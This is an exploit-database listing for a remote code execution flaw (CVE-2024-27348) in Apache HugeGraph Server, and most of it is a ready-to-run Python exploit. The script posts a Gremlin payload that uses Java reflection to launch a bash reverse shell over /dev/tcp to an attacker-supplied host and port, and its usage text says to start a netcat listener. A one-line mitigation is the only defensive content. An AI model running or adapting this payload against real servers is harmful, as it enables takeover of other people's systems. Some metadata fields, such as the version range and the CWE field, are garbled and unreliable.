Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)

vendor:

HugeGraph Server

by:

Yesith Alvarez

6.1

CVSS

HIGH

Remote Code Execution (RCE)

RCE

CWE

Product Name: HugeGraph Server

Affected Version From: 1.0.0

Affected Version To: 1.2.2000

Patch Exists: NO

Related CWE: CVE-2024-27348

CPE: a:apache:hugegraph_server:1.2.0

Metasploit:

Other Scripts:

Platforms Tested:

2024

Apache HugeGraph Server 1.2.0 – Remote Code Execution (RCE)

The Apache HugeGraph Server version 1.2.0 and prior is vulnerable to remote code execution. By sending a crafted payload to the server, an attacker can execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update Apache HugeGraph Server to a patched version (if available) and restrict network access to the server.

Source

Exploit-DB raw data:

# Exploit Title: Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://hugegraph.apache.org/docs/download/download/
# Version: Apache HugeGraph 1.0.0 - 1.2.0
# CVE : CVE-2024–27348

from requests import Request, Session
import sys
import json

def title():
    print('''
    
   ______     _______     ____   ___ ____  _  _        ____ _____ _____ _  _    ___  
  / ___\ \   / / ____|   |___ \ / _ \___ \| || |      |___ \___  |___ /| || |  ( _ ) 
 | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ __) | / /  |_ \| || |_ / _ \ 
 | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ __/ / /  ___) |__   _| (_) |
  \____|  \_/  |_____|   |_____|\___/_____|  |_|      |_____/_/  |____/   |_|  \___/ 

[+] Reverse shell                                                                                                                                                                                     
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024–27348/exploit.py
    ''')   


def exploit(url, lhost, lport):       
    payload = {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
    headers = {    
    'Content-Type': 'application/json'}
    s = Session()
    url = url + "/gremlin"
    req = Request('POST', url, json=payload, headers=headers)
    prepped = req.prepare()
    del prepped.headers['Content-Type']
    resp = s.send(prepped,
    verify=False,
    timeout=15)
    print(prepped.headers)
    print(url)
    print(resp.headers)       
    print(payload)
    print(resp.status_code)
    print(resp.text)


if __name__ == '__main__':
    title()
    if(len(sys.argv) < 4):
        print('[+] USAGE: python3 %s https://<target_url> lhost lport \n'%(sys.argv[0]))
        print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n'%(sys.argv[0]))  
        print('[+] Do not forget to run the listener: nc -lvp 4444\n')      
        exit(0)
    else:
        exploit(sys.argv[1],sys.argv[2],sys.argv[3])